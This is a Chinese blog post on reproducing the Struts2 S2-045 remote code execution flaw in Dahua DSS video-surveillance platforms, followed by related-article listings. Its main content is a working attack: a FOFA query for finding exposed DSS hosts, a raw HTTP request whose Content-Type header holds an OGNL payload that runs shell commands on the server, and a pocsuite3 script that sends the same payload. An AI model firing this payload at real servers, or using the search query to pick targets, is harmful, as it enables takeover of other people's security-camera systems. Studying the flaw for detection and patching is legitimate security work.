漏洞复现-大华dss struts2-045表达式注入漏洞(附漏洞检测脚本)

最新推荐文章于 2024-03-07 09:12:26 发布
最新推荐文章于 2024-03-07 09:12:26 发布
阅读量1.2k 收藏 8
点赞数 10
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjjj1029056414/article/details/134899127
版权

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

漏洞描述

大华DSS存在s2-45漏洞。

fofa语句

body="/portal/include/script/dahuaDefined/headCommon.js?type=index"&&title="DSS"

poc语句加检测

GET /admin/login_login.action HTTP/1.1
Host: 
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

poc脚本

脚本用的pocsuite框架

# _*_ coding:utf-8 _*_
# @Time : 2023/12/09 19:02
# @Author: 炼金术师诸葛亮
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class dahua_strutsrce(POCBase):
    pocDesc = '''大华DSS-struts2-045命令执行'''
    author = '炼金术师诸葛亮'
    createDate = '2023-12-09'
    name = '大华DSS-struts2-045命令执行'



    def _verify(self):

        result = {}
        path = "/admin/login_login.action"
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0',
            'Content-Type': "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}",
            'Upgrade-Insecure-Requests': '1',
            'Accept-Encoding': 'gzip, deflate',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'
        }

        url = self.url + path

        try:
            response = requests.get(url, headers=headers,verify=False)
        # 验证成功输出相关信息
            print(response.text)
            if response.status_code == 200 and 'bin' in response.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = self.url


            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(dahua_strutsrce)

脚本利用

炼金术师诸葛亮
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
大华 DSS 登录接口Struct2-045漏洞复现 [POC]
薛定谔嘚喵博客
12-18 585
大华 DSS只安防监控系统平台是一款集视频、报警、存储、管理于一体的综合安防解决方案。大华DSS安防 监控系统Q平台采用ApacheStruts2作为网站应用框架。大华 DSS 登录接口存在 Struct2-045漏洞,可执行系统命令并回显。由于应用程序框架存在远程命令执行漏洞,攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞,然后执行漏洞。系统命令以获取服务器权限。
大华DSS S2-045 OGNL表达式注入漏洞复现
0xSec
12-08 985
大华DSS安防监控系统平台采用ApacheStruts2作为网站应用框架。由于应用程序框架存在远程命令执行漏洞,攻击者可以通过在上传文件时修改HTTP请求标头中的Content Type值来触发该漏洞,然后执行漏洞。系统命令以获取服务器权限。
2023-0Day(漏洞检测Tools)V1.6 HW-漏洞挖掘-src
08-23
17、畅捷通Plus_ajaxpro命令执行 18、用友NC/Cloud bsh_servlet_BshServlet命令执行 19、金蝶云星空CommonFileserver任意文件读取 20、用友NC/Cloud_Jsinvoke文件上传 21、用友GRP-U8_logs敏感信息泄露 22、飞企互联FE协作平台文件读取 23、启明星辰4A统一安全管控平台信息泄露 24、大华智慧园区综合管理平台任意用户密码读取 25、大华dss城市安防监控系统平台任意文件读取 26、安恒明御安全网关命令执行 27、海康综合安防管理平台反序列化 28、海康file_js文件上传 29、海康综合安防env信息泄露 30、海康视频编码设备接入网关文件读取 31、库贝皮KubePi任意用户添加 32、Metabase_validate远程命令执行 33、用友时空KSOA_imagefield_sql注入 34、宏景HCM_SQL注入 35、华天动力OA未授权访问及SQL注入 36、致远OA_Ajaxdo_upload 37、亿赛通电子文档安全管理系统命令执行
复现大华DSS信息泄露漏洞_15
fushuang333的博客
01-11 1144
复现大华DSS信息泄露漏洞DSS大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。
漏洞复现大华DSS数字监控系统Struct2-045命令执行漏洞
最新发布
晚风不及你
03-07 591
大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统,除了具有普通安防视频监控系统的实时监视、云台操作、录像回放、报警处理、设备治理等功能外,更注重用户使用的便利性。
DH-DSS-H8900智慧园区综合管理平台
03-01
DH-DSS-H8900 系列是为通用性公共建筑物提供安全和高效管理而打造的智慧园区综合管理平台,通过融合大华在安防和智能化领域的专业经验和前沿技术,集成视频,门禁、报警,停车场,考 勤,访客,可视对讲,信息发布等多个业务 支持可视对讲,门禁一卡通、停车场管理  通过对讲设备管理,实现户户通话,室内报警联动,信息发布等功能  通过门禁管理,实现门禁的开关门,并实现门禁和视频的联动  通过卡口、道闸、LED 设备管理,实现出入口的综合性智能化管理  实现多设备、多路通道、多窗口的实时监控和预览  支持双目监控  支持鱼球联动  支持 36 路录像查询和回放  支持监控计划任务定制,多路多窗口视频轮巡、同时回放  支持本地抓图及本地录像  支持语音对讲  通过接入报警主机,实现报警管理  支持报警联动配置,弹出联动视频、查看多设备报警提示、录像信息功能 支持智能设备应用 支持智能跟踪、人数统计、主从跟随、特征识别、守望者、人脸识别等智能设备应用  通过配置电子地图,随时定位设备,从而轻松地部署管理  视频上墙,配置简单  通过配置巡更点、巡更路线,实现巡更管理
大华DSS系列客户端操作手册.docx
08-10
操作平台
大华 DSS 数字监控系统 itcBulletin SQL 注入漏洞复现
holyxp的博客
12-18 1734
大华 DSs 数字监控系统大华开发的一款安防视频监控系统,拥有实时监视、云台操作、录像回放、报警处理、设备管理等功能。大华 DSS存在SQL注入漏洞,攻击者 pota/services/itcBuletin 路由发送特殊构造的数据包,利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如,管理员后台密码、站点的用户人人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限poc验证是否存在漏洞如果你想查询用户名和密码。
原创:struts2-045漏洞浅析
热门推荐
rossrocket的博客
03-28 1万+
这是小弟写的第一篇网文,文笔一般,请大家多包涵。近期发生了很多事,使我醒悟要回归自我的同时,要作些改变,所以开始写网文,且把这些网文分享至个人的微信公众号(公众号名:永记士多)和CSDN博客(博客账号:rossrocket,昵称:永记士多)。此微信公众号和CSDN博客现定位为:专门研究web应用的漏洞,性能,并发量,框架选择等问题,技术涵盖编程语言(java,php,python)、应用框架(st
复现大华 DSS SQL 注入漏洞_46
fushuang333的博客
02-11 1517
复现大华 DSS SQL 注入漏洞,​攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
大华7016S2-DSS 接口文档
10-22
大华DSS视频http接口
大华7016S2-DSS视频综合应用平台http接口.doc
08-05
通过http传输数据 大华DSS视频http接口 通过http传输数据 大华DSS视频http接口 通过http传输数据 大华DSS视频http接口 通过http传输数据 大华DSS视频http接口 通过http传输数据 大华DSS视频http接口
Struts2-045漏洞利用工具
08-11
Struts2-045漏洞利用工具
大华7016S2-DSS视频综合应用平台http接口
03-24
大华7016S2-DSS视频综合应用平台http接口
网络服务器调试报错:code = -1011 code = 3840
极客学伟的技术分享社区
01-14 8420
Error Domain=NSCocoaErrorDomain Code=3840 "Invalid value around character 0." UserInfo={NSDebugDescription=Invalid value around character 0., NSUnderlyingError=0x7fe90b5a6830 {Error Domain=com.alamofir
常见漏洞的防御措施整理
千寻的博客
06-10 3161
常见漏洞的服务措施整理,详细版。
漏洞复现大华DSS数字监控系统itcBulletin SQL注入漏洞
晚风不及你
03-06 709
大华DSS数字监控系统是一个在通用安防视频监控系统基础上设计开发的系统,除了具有普通安防视频监控系统的实时监视、云台操作、录像回放、报警处理、设备治理等功能外,更注重用户使用的便利性。
漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞
weixin_67503304的博客
08-22 7071
从源码的角度分析Struts2(s2-045)远程命令执行漏洞,利用java详细讲解造成漏洞的原因,包含了Structs2高危漏洞exp的扫描利用工具
大华dss平台sdk
12-25
大华DSS平台SDK是大华公司提供的软件开发工具包,用于帮助开发者快速、高效地进行DSS平台的应用程序开发。该SDK包含了丰富的API和工具,可以帮助开发者实现视频监控、录像回放、远程操作等功能。 通过DSS平台SDK,开发者可以轻松地与大华的视频监控设备进行通信和交互,实现对设备的控制和管理。SDK还提供了丰富的图像处理和分析功能,可以帮助开发者开发出更加智能和高效的视频监控应用程序。 DSS平台SDK支持多种开发语言和平台,包括C/C++、Java、.NET等,可以在不同的操作系统和硬件平台上进行开发。这样就可以满足各种不同需求和环境下的应用开发需求。 另外,大华DSS平台SDK还提供了丰富的开发文档和示例代码,方便开发者学习和使用。开发者可以通过这些文档和示例快速上手,快速完成应用程序的开发和部署。 总之,大华DSS平台SDK是一款功能强大、易于使用的软件开发工具包,可以帮助开发者快速实现视频监控应用程序的开发和部署,提高开发效率,降低开发成本。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值